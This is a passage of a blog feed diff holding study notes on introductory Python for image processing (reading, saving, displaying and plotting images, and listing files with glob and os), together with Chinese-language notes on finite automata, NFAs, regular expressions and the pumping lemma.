    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\2728092902.py:2: RuntimeWarning: divide by zero encountered in log  fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))

    png

    ]]>
    @@ -9408,7 +9408,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(22-28)-Python%20Libraries/ - Main text

    Fundamental steps in digital image processing

    • Image acquisition
    • Image enhancement: manipulating an image so that the result is more suitable than the original for a specific application
    • Image restoration: improving the appearance of an image, tending to be based on mathematical or probabilistic models of image degradation
    • Color image processing
    • Wavelets: the foundation for representing images at multiple resolutions
    • Morphological processing: tools for extracting image components that are useful for representing and describing shape
    • Segmentation: partitioning an image into its constituent parts and objects
    • Feature extraction
    • Image pattern classification: assigning labels to objects based on their feature descriptors

    Tutorial 22 - Reading images into Python

    Reading Images into Python

    • scikit-image: pip install scikit-image
    • opencv: pip install opencv-python
    • Pillow: PIL - does not import images as numpy array. You can convert using numpy.asarray(img)

    Reading images with skimage

    from skimage import io

    img = io.imread('images/Osteosarcoma_01.tif')
    img.shape # y, x, c, dtype=uint8
    (1104, 1376, 3)
    • Convert to float format
    from skimage import io, img_as_float

    img2 = img_as_float(img)

    Do not use .astype(np.float): np.float is deprecated, and astype only recasts the values instead of rescaling them to the [0, 1] range that skimage expects.

    import numpy as np

    img3 = img.astype(np.float64)
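
    A quick way to see the difference (a minimal sketch, reusing the img2 and img3 variables from above):

    print(img2.max())   # 1.0   - img_as_float rescales the values into [0, 1]
    print(img3.max())   # 255.0 - astype only recasts the values, without rescaling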

    Converting an image to uint8 format

    from skimage import io, img_as_ubyte

    img_8bit = img_as_ubyte(img2)

    png

    Reading images with OpenCV

    import cv2

    img_cv2 = cv2.imread('images/Osteosarcoma_01.tif') # color image
    grey_img = cv2.imread('images/Osteosarcoma_01.tif', 0) # grayscale image
    color_img = cv2.imread('images/Osteosarcoma_01.tif', 1) # color image
    img_opencv = cv2.cvtColor(color_img, cv2.COLOR_BGR2RGB) # convert the image to RGB

    OpenCV uses the BGR color space by default, while skimage uses RGB.

    png

    Tutorial 23 - Reading proprietary images in python

    • Reading proprietary image files with Python
    import tifffile

    img = tifffile.imread('images/Osteosarcoma_01.tif')
    from skimage import io

    img2 = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
    • tif also comes in 3D image and time-series variants

    • czi (a microscopy image format) can also be read (time series, scenes, channels, y, x, z, RGB)

    Such a specialized image format…

    # Let us extract only relevant pixels, all channels in x and y
    img1 = img[0, 0, :, :, :, 0] # keep height, width, channels

    # Next, let us extract each channel image.
    img2 = img1[0, :, :] # first channel: Red
    img3 = img1[1, :, :] # second channel: Green
    img4 = img1[2, :, :] # third channel: Blue (DAPI)

    Tutorial 24 - Saving images from python to your local drive

    skimage

    from skimage import io

    img = io.imread('images/Osteosarcoma_01.tif')
    from skimage import filters

    gaussian_img = filters.gaussian(img, sigma=3) # the image becomes float here
    io.imsave('images/exported/saved_using_skimage.jpg', gaussian_img)
    Lossy conversion from float64 to uint8. Range [0, 1]. Convert image to uint8 prior to saving to suppress this warning.
    io.imsave('images/exported/saved_using_skimage.tif', gaussian_img)  # cannot be opened, since viewers do not recognize float-format colors
    from skimage import img_as_ubyte

    gaussian_img_8bit = img_as_ubyte(gaussian_img)
    io.imsave('images/exported/saved_using_skimage_8bit.tif', gaussian_img_8bit) # this one can be opened

    OpenCV

    import cv2

    # OpenCV does not map floats to the 0-255 range; it truncates them directly, so the saved image appears black
    cv2.imwrite('images/exported/saved_using_opencv.jpg', gaussian_img)
    True
    # OpenCV writes in the BGR color model by default; saving directly shifts the colors
    cv2.imwrite('images/exported/saved_using_opencv_8bit.jpg', gaussian_img_8bit)
    True
    # convert first, then save
    gaussian_img_8bit_RGB = cv2.cvtColor(gaussian_img_8bit, cv2.COLOR_BGR2RGB)
    cv2.imwrite('images/exported/saved_using_opencv_8bit_RGB.jpg', gaussian_img_8bit_RGB)
    True

    matplotlib

    from matplotlib import pyplot as plt

    plt.imsave('images/exported/saved_using_pyplot.jpg', gaussian_img)

    tifffile

    import tifffile

    tifffile.imwrite('images/exported/saved_using_tifffile.tiff', gaussian_img)

    png

    Tutorial 25 - Viewing 2d images in python

    matplotlib

    from skimage import io

    img = io.imread('images/Osteosarcoma_01.tif')

    io.imshow(img)
    <matplotlib.image.AxesImage at 0x1d668f31a08>

    png

    import matplotlib.pyplot as plt

    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x1d66951bbc8>

    png

    cmap: display grayscale images in various color styles:

    pyplot cmap 颜色 - 知乎 (zhihu.com)

    png

    img_gray = io.imread('images/Osteosarcoma_01.tif', as_gray=True)
    plt.imshow(img_gray, cmap='hot')
    <matplotlib.image.AxesImage at 0x1d6698518c8>

    png

    plt.imshow(img_gray, cmap='jet')
    <matplotlib.image.AxesImage at 0x1d6698c9948>

    png

    plt.imshow(img_gray, cmap='Blues')
    <matplotlib.image.AxesImage at 0x1d66b5018c8>

    png

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img_gray, cmap='hot')
    ax1.title.set_text('1st')

    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(img_gray, cmap='jet')
    ax2.title.set_text('2nd')

    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(img_gray, cmap='gray')
    ax3.title.set_text('3rd')

    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_gray, cmap='nipy_spectral')
    ax4.title.set_text('4th')
    plt.show()

    png

    OpenCV

    import cv2

    gray_img = cv2.imread("images/Osteosarcoma_01.tif", 0)
    color_img = cv2.imread("images/Osteosarcoma_01.tif", 1)

    # Use the function cv2.imshow() to display an image in a window.
    # First argument is the window name which is a string. second argument is our image.

    cv2.imshow("pic from skimage import", img) # Shows weird colors as R and B channels are swapped
    cv2.imshow("color pic from opencv", color_img)
    cv2.imshow("gray pic from opencv", gray_img)

    # Keep the output windows open until
    # the user presses a key (waitKey(0) waits indefinitely)
    cv2.waitKey(0)

    # destroys all windows created
    cv2.destroyAllWindows()

    png

    Tutorial 26 - Basic plotting in python using matplot.pyplot

    Shows how to use the matplotlib library

    • Drawing a line plot
    from matplotlib import pyplot as plt

    x = [1, 2, 3, 4, 5]
    y = [1, 4, 9, 16, 25]

    plt.plot(x, y)
    [<matplotlib.lines.Line2D at 0x22168454048>]

    png

    import numpy as np

    a = np.array(x)
    b = np.array(y)
    plt.plot(a, b)
    [<matplotlib.lines.Line2D at 0x22168e11148>]

    png

    • Displaying an image
    import cv2

    gray_img = cv2.imread('images/sandstone.tif', 0)

    plt.imshow(gray_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x2216b0b5908>

    png

    • Displaying a histogram
    plt.hist(gray_img.flat, bins=100, range=(0, 150))
    (array([  544.,    30.,    99., …, 1213.,  2205.,  1962.]), array([  0. ,   1.5,   3. , …, 148.5, 150. ]), <BarContainer object of 100 artists>)

    png

    • Plot styling
    from matplotlib import pyplot as plt
    import numpy as np

    a = np.array([1, 2, 3, 4, 5])
    b = np.array([1, 4, 9, 16, 25])

    plt.plot(a, b, 'r--')
    plt.axis([0, 6, 0, 50])
    (0.0, 6.0, 0.0, 50.0)

    png

    • Multiple plot types
    from matplotlib import pyplot as plt

    wells = ['well1', 'well2', 'well3', 'well4', 'well5']
    cells = [80, 62, 88, 110, 90]

    plt.bar(wells, cells) # bar chart
    plt.scatter(wells, cells) # scatter plot
    plt.plot(wells, cells) # line plot
    [<matplotlib.lines.Line2D at 0x2216c346dc8>]

    png

    from matplotlib import pyplot as plt

    # Adding labels and annotations
    wells = [1,2,3,4,5]
    cells = [80, 62, 88, 110, 90]

    plt.figure(figsize=(8, 8))
    plt.bar(wells, cells)
    plt.xlabel('Well #', fontsize=18, color='red')
    plt.ylabel('# dead cells')
    plt.title('Dead cells in each well')
    plt.axis([1, 6, 60, 120]) #xmin, xmax, ymin, ymax
    plt.grid(True) # show the grid
    plt.show()

    png

    • Changing the axis scale
    from matplotlib import pyplot as plt

    x = [1,2,3,4,5]
    y = [10, 125, 1350, 11250, 100500]

    plt.figure(figsize=(12, 6))

    # linear
    plt.subplot(121)
    plt.plot(x, y)
    plt.yscale('linear')
    plt.title('linear')
    plt.grid(True)

    #Log
    plt.subplot(122)
    plt.plot(x, y)
    plt.yscale('log')
    plt.title('log')
    plt.grid(True)

    png

    • Displaying multiple plots
     from matplotlib import pyplot as plt

    wells = ['well1', 'well2', 'well3', 'well4', 'well5']
    cells = [80, 62, 88, 110, 90]


    # Initialize the plot and subplots
    fig = plt.figure(figsize=(16,6))
    ax1 = fig.add_subplot(131)
    ax1.set(title='vertical bar', xlabel='Well #', ylabel='# cells')

    ax2 = fig.add_subplot(132)
    ax2.set(title='horizontal bar', xlabel='Well #', ylabel='# cells')

    ax3 = fig.add_subplot(133)

    # Plot the data
    ax1.bar(wells, cells)
    ax2.barh(wells, cells)
    ax3.plot(wells, cells)

    plt.savefig("images/my_plot.jpg") # Save plot
    # Show the plot
    plt.show()

    png

    Tutorial 27 - Using glob to read multiple files in python

    Python 模块之 glob 模块 - 知乎

    Use glob to traverse a folder and get the names of all the files inside it

    • Getting the whole list at once
    import cv2
    import glob

    file_list = glob.glob('images/*.*')
    file_list
    ['images\\Alloy_gradient.jpg', 'images\\BSE.tif', 'images\\bubbles.tif', 'images\\cast_iron1.tif', 'images\\cast_iron2.jpg', 'images\\monalisa.jpg', 'images\\Osteosarcoma_01.tif', 'images\\Osteosarcoma_01_1sigma_blur.tif', 'images\\Osteosarcoma_01_25Sigma_noise.tif', 'images\\Osteosarcoma_01_2sigma_blur.tif', 'images\\Osteosarcoma_01_8bit.ome.tiff', 'images\\Osteosarcoma_01_8bit_salt_pepper.tif', 'images\\Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 'images\\Osteosarcoma_01_small.tif', 'images\\Osteosarcoma_01_transl.tif', 'images\\Osteosarcoma_01_transl_rot.tif', 'images\\sandstone.tif', 'images\\sandstone_blur_2sigma.tif', 'images\\sandstone_low_contrast.tif', 'images\\scratch_time_series.tif', 'images\\synthetic.jpg', 'images\\Ti_powder.tif', 'images\\Ti_powder_single.tif']
    • Building the list with a for loop
    my_list = []
    path = 'images/*.*'
    for file in glob.glob(path):
        print(file)
        a = cv2.imread(file)
        my_list.append(a)
    images\Alloy_gradient.jpg
    images\BSE.tif
    images\bubbles.tif
    …
    images\Ti_powder_single.tif

    Tutorial 28 - Using os.listdir to read multiple files

    • Using os.listdir
    import os

    path = 'images/'
    print(os.listdir(path))

    for image in os.listdir(path):
    print(image)
    ['Alloy_gradient.jpg', 'BSE.tif', 'bubbles.tif', …, 'Ti_powder.tif', 'Ti_powder_single.tif']
    Alloy_gradient.jpg
    BSE.tif
    bubbles.tif
    …
    Ti_powder_single.tif
    • Traversing files with os.walk
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
        # root is the path of the folder currently being visited
        # dirs is the list of subdirectory names inside that folder
        # files is the list of file names inside that folder
        # iterate over the files
        for f in files:
            print(os.path.join(root, f))
    <generator object walk at 0x000001AAF06408C8>
    .\4.ipynb
    .\Untitled.ipynb
    …
    .\images\exported\saved_using_tifffile.tiff
    • Traversing folders with os.walk
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
        # root is the path of the folder currently being visited
        # dirs is the list of subdirectory names inside that folder
        # files is the list of file names inside that folder
        # iterate over the folders
        for d in dirs:
            print(os.path.join(root, d))
    <generator object walk at 0x000001AAF06406C8>
    .\.ipynb_checkpoints
    .\images
    .\images\exported
    ]]>
    @@ -9435,7 +9435,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(1-21)-Python%20Basics/ - Related resources

    Course

    Tutorial 01 - Why is it important for researchers to learn coding?

    Tutorial 02 - What is digital image processing?

    Tutorial 03 - Image processing in imageJ, ZEN, and APEER

    Tutorial 04 - Appreciating the simplicity of python

    • Applying a sigma=2 Gaussian blur to an image with Python
    from skimage import io, filters
    from matplotlib import pyplot as plt

    img = io.imread('images/Osteosarcoma_01_25Sigma_noise.tif') # read the image
    gaussian_img = filters.gaussian(img, sigma=2) # apply a Gaussian blur

    plt.imshow(gaussian_img) # display the image

    png

    Tutorial 05 - How to install python using Anaconda

    Shows how to install Anaconda and Spyder…

    Tutorial 06 - Understanding Anaconda Packages

    Shows how to use Anaconda…

    Tutorial 06b - Understanding python environments (using Anaconda)

    Shows how to manage Anaconda environments…

    Tutorial 07 - Getting familiar with spyder IDE

    Shows how to use Spyder…

    png

    The Variable Explorer can show variable types and values in real time? Interesting.

    Tutorial 08 - What are libraries in python

    Introduces the concept of a library in Python

    Tutorial 09 - Top 5 python libraries for image analysis

    PyPI · The Python Package Index

    • Image processing
      • scikit-image
      • Opencv-python
    • Data analysis
      • numpy
      • pandas
    • Plotting & visualization
      • matplotlib
    • Other libraries worth mentioning
      • scipy - scientific and numerical tools, an extension of numpy
      • keras / tensorflow - deep learning
      • seaborn and plotly - advanced, highly customizable plotting
      • czifile, tifffile - many other libraries for specific tasks

    Tutorial 10 - Writing your first lines of code in Python

    Shows how to write Python code in Spyder; never mind, I'll stick with Jupyter…

    Tutorial 11 - Operators and basic math in Python

    Shows how to use operators and basic math in Python…

    Tutorial 12 - What are Lists in Python

    Shows how to use Python lists…

    Tutorial 13 - What are Tuples in Python

    Shows how to use Python tuples…

    Basically a list whose values cannot change after definition…

    Tutorial 14 - What are Dictionaries in Python

    Shows how to use Python dictionaries…

    Dictionaries: a key and a value

    • Three ways to define a dictionary:
    life_sciences = {'Botany': 'plants',
                     'Zoology': 'animals',
                     'Virology': 'viruses',
                     'Cell_biology': 'cells'}
    life_sciences = dict([('Botany', 'plants'),
                          ('Zoology', 'animals'),
                          ('Virology', 'viruses'),
                          ('Cell_biology', 'cells')])
    life_sciences = dict(Botany='plants',
                         Zoology='animals',
                         Virology='viruses',
                         Cell_biology='cells')
    • Checking the type of a variable
    type(life_sciences)
    dict
    • Lookup
    print('Zoology' in life_sciences)
    True
    • Adding an element
    life_sciences['Neuroscience'] = 'nervous_system'
    print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells', 'Neuroscience': 'nervous_system'}
    • Deleting an element
    del life_sciences['Neuroscience']
    print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells'}
    • Only tuples, not lists, can be used as dictionary keys:
    b = {(1, 0): 'a', (1, 1): 'b', (2, 2): 'c', (3, 2): 'd'}
    c = {[1, 0]: 'a', [1, 1]: 'b', [2, 2]: 'c', [3, 2]: 'd'}
    ---------------------------------------------------------------------------
    TypeError: unhashable type: 'list'
    • Listing the dictionary keys
    d = list(life_sciences.keys())
    d
    ['Botany', 'Zoology', 'Virology', 'Cell_biology']
    • Listing the dictionary values
    e = list(life_sciences.values())
    e
    ['plants', 'animals', 'viruses', 'cells']

    Tutorial 15 - What are numpy arrays in Python

    An introduction to numpy

    • How numpy arrays differ from lists:
    a = [1, 2, 3, 4, 5]
    b = 2 * a
    b
    [1, 2, 3, 4, 5, 1, 2, 3, 4, 5]
    type(a)
    list
    import numpy as np

    c = np.array(a)
    d = 2 * c
    d
    array([ 2,  4,  6,  8, 10])
    type(c)
    numpy.ndarray
    c ** 2
    array([ 1,  4,  9, 16, 25], dtype=int32)
    • Setting the data type
    import numpy as np

    x = np.array([[1, 2], [3, 4]]) # integer array
    y = np.array([[1, 2], [3, 4]], dtype=np.float64) # float array
    y/2
    array([[0.5, 1. ],       [1.5, 2. ]])
    • Reading an image and storing it as a numpy array
    from skimage import io

    img1 = io.imread('images/Osteosarcoma_01.tif')
    type(img1)
    numpy.ndarray
    • Image shape: (height, width, channels)
    img1.shape
    (1104, 1376, 3)
    • Creating images
      • Create an all-ones image with the same size as img1
    a = np.ones_like(img1)
    a.shape
    (1104, 1376, 3)
    • Slicing
    import numpy as np

    a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
    np.shape(a)
    (3, 4)
    a
    array([[ 1,  2,  3,  4],       [ 5,  6,  7,  8],       [ 9, 10, 11, 12]])
    a[:2]
    array([[1, 2, 3, 4],       [5, 6, 7, 8]])
    a[:2, 1:3]
    array([[2, 3],       [6, 7]])
    • Summation
    np.sum(a, axis=0)
    array([15, 18, 21, 24])
    np.sum(a, axis=1)
    array([10, 26, 42])
    np.max(a)
    12

    Tutorial 16 - Data types in python

    • Data types:

    Type: names
    Text: str
    Numbers: int, float, complex
    Arrays (lists): list, tuple, range
    Mapping: dict
    Boolean (True/False): bool

    • For image processing using skimage:

    dtype: value range
    uint8: 0 to 255
    uint16: 0 to 65535
    uint32: 0 to 2^32-1
    float: -1 to 1 or 0 to 1
    int8: -128 to 127
    int16: -32768 to 32767
    int32: -2^31 to 2^31-1
    • Example
    from skimage import io, img_as_float

    img = io.imread('images/Osteosarcoma_01.tif')
    img2 = img_as_float(img)

    png

    img.max()
    255
    img2.max()
    1.0

    Tutorial 17 - if and else statements in python

    Shows how to use if-else statements in Python…

    Tutorial 18 - while loops in python

    Shows how to use while loops in Python…

    Tutorial 19 - for loops in python

    Shows how to use for loops in Python…

    Typically used to iterate over the values of an array

    Tutorial 20 - Functions in Python

    Shows how to use functions in Python…

    Tutorial 21 - Lambda Functions in Python

    • An ordinary function
    def squared(x):
        return x ** 2
    squared(4)
    16
    • A lambda function
    a = lambda x: x ** 2
    a(5)
    25
    • Using a lambda function with several arguments
    a = lambda x, y: 2 * x ** 2 + 3 * y
    a(3, 5)
    33
    • Mixing lambda and ordinary functions
    # S = u*t + (1/2)*a*t**2

    def distance_eqn(u, a):
        return lambda t: u * t + ((1 / 2) * a * t ** 2)
    dist = distance_eqn(5, 10)
    dist(20)
    2100.0
    distance_eqn(5, 10)(20)
    2100.0
    ]]>
    @@ -9514,7 +9514,7 @@ /posts/Theory-%E8%AE%A1%E7%AE%97%E7%90%86%E8%AE%BA%E5%AF%BC%E5%BC%951/ - Chapter 1: Regular Languages

    Rather than attacking the complex, hard problems of real computers directly, we build a tractable mathematical theory for them - by introducing computational models.

    • Computational model
      • An idealized computer.
      • It captures certain features accurately while ignoring others, so different models are chosen depending on which features matter.
      • The simplest model - the automaton.

    1.1 Finite Automata

    • What is a "finite automaton"?
      • A model of a computer whose descriptive power and resources are extremely limited.
    • Viewing "finite automata" mathematically
      • A purely abstract description, not tied to any specific application.
      • Input: a string.
      • Output: yes or no.
    • With such limited power, what can it do?
      • Quite a lot (it sits at the core of electromechanical devices).

    An example: an automatic door controller.

    png

    The controller is in the CLOSED state; suppose the input signals are FRONT, REAR, NEITHER, FRONT, BOTH, NEITHER, REAR, NEITHER - consider how the state changes.

    This yields a computation over states and signals.


    png

    • The state diagram of $M_1$
      • The start state $q_1$ is indicated by an arrow pointing at it from nowhere.
      • The accept state $q_2$ is drawn with a double circle.
      • An arrow going from one state to another is called a transition.

    State/Signal | 0 | 1
    $q_1$ | $q_1$ | $q_2$
    $q_2$ | $q_3$ | $q_2$
    $q_3$ | $q_2$ | $q_2$

    • When this automaton receives an input string such as 1101, it processes the string and produces an output: accept or reject.
      • Processing begins in $M_1$'s start state. The automaton receives the symbols of the input string one by one, from left to right.
      • After reading each symbol, $M_1$ moves from one state to another along the transition labeled with that symbol.
      • When it reads the last symbol, $M_1$ produces its output:
        • accept if $M_1$ is now in an accept state;
        • reject otherwise.

    Describing the automaton in C:

    char *input, *pCurr;                    /* Bool, TRUE, FALSE assumed from a local typedef */
    Bool FA_func()
    {
    q1: if (*pCurr == '\0') return FALSE;   /* q1 is not an accept state */
        if (*pCurr++ == '0') goto q1;
        else goto q2;
    q2: if (*pCurr == '\0') return TRUE;    /* q2 is the accept state */
        if (*pCurr++ == '0') goto q3;
        else goto q2;
    q3: if (*pCurr == '\0') return FALSE;   /* q3 is not an accept state */
        pCurr++;                            /* on both 0 and 1, go to q2 */
        goto q2;
    }

    An automaton corresponds to a program with only if and goto - no arrays, no internal variables;

    a program is less intuitive than the diagram.

    1.1.1 有穷自动机的形式化定义

    • 有穷自动机是一个 5 元组($Q,\Sigma,\delta,q_0,F$)(状字转起接),其中
        1. $Q$ 是一个有穷集合,称为状态集
        2. $\Sigma$ 是一个有穷集合,称为字母表
        3. $\delta:Q\times \Sigma\to Q$ 是转移函数
        4. $q_0\in Q$ 是起始状态
        5. $F\subseteq Q$ 是接收状态集

    png

可以把 $M_1$ 形式地写成 $M_1=(Q,\Sigma,\delta,q_1,F)$,其中

1. $Q=\{q_1,q_2,q_3\}$

2. $\Sigma=\{0,1\}$

3. $\delta$ 描述为:

状态/信号    0        1
$q_1$        $q_1$    $q_2$
$q_2$        $q_3$    $q_2$
$q_3$        $q_2$    $q_2$

4. $q_1$ 是起始状态。

5. $F=\{q_2\}$

    1.1.2 有穷自动机举例

即,$M_1$ 可形式化描述为 $M_1=(\{q_1,q_2,q_3\},\{0,1\},\delta,q_1,\{q_2\})$,转移函数 $\delta$ 为:

状态/信号    0        1
$q_1$        $q_1$    $q_2$
$q_2$        $q_3$    $q_2$
$q_3$        $q_2$    $q_2$

    形式化描述就是一个 5 元组。


若 $A$ 是机器 $M$ 接受的全部字符串的集合,则称 $A$ 是机器 $M$ 的语言,记作 $L(M)=A$,又称 $M$ 识别 $A$ 或 $M$ 接受 $A$。(这把计算模型与语言结合到一起,而语言又可以对问题进行编码,因此就通过语言把计算模型与问题关联起来)

$L(M_1)=\{w\mid w\ 至少含有一个\ 1\ 并且在最后的\ 1\ 后面有偶数个\ 0\}$

    1.1.3 计算的形式化定义

    形式化定义能够清除在非形式化描述中可能出现的任何二义性。

    ​ 设 $M=(Q,\Sigma,\delta,q_0,F)$ 是一台有穷自动机,$w=w_1 w_2 … w_n$ 是一个字符串并且其中任一 $w_i$ 是字母表 $\Sigma$ 的成员。如果存在 $Q$ 中的状态序列 $r_0,r_1,…,r_n$,满足下述条件:(为了解释自动机如何接受这个字符串)

    • $r_0=q_0$(起始状态吻合)
    • $\delta(r_i,w_{i+1})=r_{i+1},i=0,…,n-1$ (转移函数吻合)
    • $r_n\in F$ (接收状态吻合)

则 $M$ 接受 $w$。

如果 $A=\{w\mid M\ 接受\ w\}$,则称 $M$ 识别语言 $A$。

如果一个语言被一台有穷自动机识别,则称它是正则语言(regular language)。

    1.1.4 设计有穷自动机

例 1:设计有穷自动机 $E_1$,假设字母表是 $\{0,1\}$,识别的语言由所有含有奇数个 1 的字符串组成。

    png

例 2:设计有穷自动机 $E_2$,使其能够识别由所有含有 001 作为子串的字符串组成的正则语言。

    png
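可以用几行 Python 按 1.1.3 的形式化定义来检验这类设计(示意性草稿,此处以前文的 $M_1$ 为例;delta、accepts 等命名均为本文补充的假设):

delta = {('q1', '0'): 'q1', ('q1', '1'): 'q2',
         ('q2', '0'): 'q3', ('q2', '1'): 'q2',
         ('q3', '0'): 'q2', ('q3', '1'): 'q2'}

def accepts(w, start='q1', accept=('q2',)):
    r = start                   # r_0 = q_0
    for c in w:
        r = delta[(r, c)]       # r_{i+1} = delta(r_i, w_{i+1})
    return r in accept          # 接受当且仅当 r_n 属于 F

accepts('1101')
True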

    1.1.5 正则运算

    ​ 如果一个语言被一台有穷自动机识别,则称它是正则语言(regular language)。

定义:设 $A$ 和 $B$ 是两个语言,定义正则运算并、连接和星号:

设字母表 $\Sigma$ 是标准的 26 个字母 $\{a,b,…,z\}$。又设 $A=\{good,bad\}$,$B=\{boy,girl\}$,则:

$A\cup B=\{good,bad,boy,girl\}$

$A\circ B=\{goodboy,goodgirl,badboy,badgirl\}$

$A^*=\{\varepsilon(空串),good,bad,goodgood,goodbad,badgood,badbad,goodgoodgood,…\}$
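这三种运算也可以形式化地写出(补充说明,按标准定义):

$$A\cup B=\{x\mid x\in A\ 或\ x\in B\},\qquad A\circ B=\{xy\mid x\in A\ 且\ y\in B\},\qquad A^*=\{x_1x_2\cdots x_k\mid k\ge 0\ 且每个\ x_i\in A\}$$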

    ​ 如果把某种运算应用于一个对象集合的成员得到的对象仍在这个集合中,则称这个对象集合在该运算下封闭

    正则语言类在并、连接、星号运算下封闭。

    1.2 非确定性

    • 有穷自动机(Finite Automata)FA

    • 确定型有穷自动机(Deterministic Finite Automata)DFA

    • 非确定型有穷自动机(NonDeterministic Finite Automata)NFA

    ​ 证明定理遇到困难,暂时放下——引入不确定性

    • 确定性:机器处于给定状态并读入下一个输入符,可以知道机器的下一个状态是什么——确定的。
• 不确定性:在任何一个点,下一个状态可能存在若干种选择。体现在:
  • 转移规则——同一状态对同一输入可以"一入多出";
  • $\varepsilon$ 转移——不读入任何输入符号的转移(如当前状态 $q_2$ 不稳定,不消耗输入,自动转到下一个状态 $q_3$)。

png

设 $A$ 是 $\{0,1\}$ 上倒数第三个符号为 1 的所有字符串组成的语言,下图 NFA $N_2$ 识别 $A$。

    png

    ​ 让其停留在起始状态 $q_1$,直到它“猜想”它正好位于倒数第三的位置上。

    1.2.1 非确定型有穷自动机的形式化定义

    非确定型有穷自动机是一个 5 元组 $(Q,\Sigma,\delta,q_0,F)$,其中

    • $Q$ 是有穷的状态集
• $\Sigma$ 是有穷的字母表
    • $\delta:Q\times{\color{red}\Sigma_\varepsilon}\to P(Q)$ 是转移函数(仅在转移函数上与 DFA 不同)。
    • $q_0\in Q$ 是起始状态
    • $F\subseteq Q$ 是接收状态集

    png

    $N_1$ 的形式化描述是 $(Q,\Sigma,\delta,q_1,F)$,其中

1. $Q=\{q_1,q_2,q_3,q_4\}$;
2. $\Sigma =\{0,1\}$;
3. $\delta$ 由下表给出:

状态/信号    0              1                $\varepsilon$
$q_1$        $\{q_1\}$      $\{q_1,q_2\}$    $\varnothing$
$q_2$        $\{q_3\}$      $\varnothing$    $\{q_3\}$
$q_3$        $\varnothing$  $\{q_4\}$        $\varnothing$
$q_4$        $\{q_4\}$      $\{q_4\}$        $\varnothing$

4. $q_1$ 是起始状态;
5. $F=\{q_4\}$

    1.2.2 NFA 与 DFA 的等价性

    NFA $\Leftrightarrow $ DFA

    每一台非确定型有穷自动机都等价(识别同样的语言)于某一台确定型有穷自动机。

    一个语言是正则的,当且仅当有一台非确定型有穷自动机识别它。

    png

    为了消除 $\varepsilon$,额外构造状态:

    png

    删除不必要的状态:

    png
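上面的转换就是"子集构造法":DFA 的每个状态对应 NFA 状态的一个集合,并用 $\varepsilon$ 闭包处理空转移。下面是一个示意性的 Python 草稿(非教材内容;nfa_delta 把 (状态, 符号) 映射到状态集合,空串 '' 表示 $\varepsilon$,这些命名均为本文补充的假设):

from itertools import chain

def eps_closure(states, nfa_delta):
    # 沿 epsilon 转移反复扩张,直到不再加入新状态
    closure, frontier = set(states), list(states)
    while frontier:
        q = frontier.pop()
        for r in nfa_delta.get((q, ''), set()):
            if r not in closure:
                closure.add(r)
                frontier.append(r)
    return frozenset(closure)

def nfa_to_dfa(nfa_delta, start, accepts, alphabet):
    d_start = eps_closure({start}, nfa_delta)
    d_delta, seen, todo = {}, {d_start}, [d_start]
    while todo:
        S = todo.pop()
        for a in alphabet:
            # S 中每个状态读符号 a 能到达的状态集,再取 epsilon 闭包
            moved = set(chain.from_iterable(nfa_delta.get((q, a), set()) for q in S))
            T = eps_closure(moved, nfa_delta)
            d_delta[(S, a)] = T
            if T not in seen:
                seen.add(T)
                todo.append(T)
    d_accepts = {S for S in seen if S & set(accepts)}
    return d_start, d_delta, d_accepts

生成的 DFA 状态数最坏可达 $2^{|Q|}$;上面的写法只生成从起始状态可达的子集,这也正是图中"删除不必要的状态"一步的意义。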

• DFA 便于机器执行,NFA 便于人来构造;通常人先设计 NFA,再让机器把它转换成 DFA。
• 用并行技术去实现时,实际运行的相当于 NFA。
• 对有指数个结点的树做回溯和搜索时(这里广度优先可能比深度优先好),用的是 DFA。
• 对应于 NFA 这样的简单并行程序是可以串行化的。

    1.2.3 在正则运算下的封闭性

    正则语言类在并、连接、星号运算下封闭。

    1.3 正则表达式

    可以用正则运算符构造描述语言的表达式,称为正则表达式

    1.3.1 正则表达式的形式化定义

    Python 正则表达式 | 菜鸟教程 (runoob.com)

    称 $R$ 是一个正则表达式,如果 $R$ 是:

    1. $a$,这里 $a$ 是字母表 $\Sigma$ 中的一个元素;
    2. $\varepsilon$;(表示只包含一个字符串——空串的语言,而 $\varnothing$ 表示不包含任何字符串的语言)
    3. $\varnothing$;

    (归纳定义)

4. $R_1\cup R_2$,这里 $R_1$ 和 $R_2$ 是正则表达式;
5. $(R_1\circ R_2)$,这里 $R_1$ 和 $R_2$ 是正则表达式;
6. $(R_1^*)$,这里 $R_1$ 是正则表达式。

1.3.2 与有穷自动机的等价性

    png

    png

    广义非确定型有穷自动机:GNFA

    • 起始状态有射到其他每一个状态的箭头,但是没有从任何其他状态射入的箭头。(避免死循环)
    • 有唯一的一个接收状态,并且它有从其他每一个状态射入的箭头,但是没有射到任何其他状态的箭头。此外,这个接收状态与起始状态不同。
    • 除起始状态和接收状态外,每一个状态到自身和其他每一个状态都有一个箭头。

    1.4 非正则语言

任何不能被正则表达式所定义的语言都是非正则语言(Nonregular languages),这样的语言有无穷多个。

    关于正则语言的泵引理

    泵引理是形式语言与自动机理论中判定一个语言不是正则语言的重要工具,下面介绍的是其通用的形式,除此之外还有其推广的强泵引理等。

语言中的所有字符串,只要长度不小于某个特定值——泵长度,就可以被"抽取"(pump):

——每一个这样的字符串都包含一段子串,把这段子串重复任意多次,得到的字符串仍在这个语言中。

